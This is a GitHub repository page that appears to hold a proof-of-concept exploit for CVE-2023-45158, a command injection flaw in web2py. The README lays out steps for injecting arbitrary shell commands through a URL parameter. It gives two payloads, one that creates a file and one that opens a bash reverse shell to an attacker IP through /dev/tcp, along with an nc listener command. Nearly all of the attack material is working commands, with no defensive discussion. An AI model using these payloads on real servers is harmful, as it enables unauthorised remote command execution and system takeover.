Skip to content

play0000/CVE-2023-45158

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
web2py
web2py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2023-45158

Steps

  1. Run the webserver
cd web2py
python3 web2py.py
  1. Inject your command using the URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Replace <IP-ADDRESS> and <YOUR-COMMAND> with your values.

Examples

  1. Create a file on the server

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. Reverse shell

On the attacker's machine, run nc -l 127.0.0.1 8080

Go to URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Replace <ATTACKER-IP>.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 88.6%
  • HTML 4.6%
  • JavaScript 3.7%
  • Shell 1.4%
  • CSS 0.8%
  • Dockerfile 0.5%
  • Other 0.4%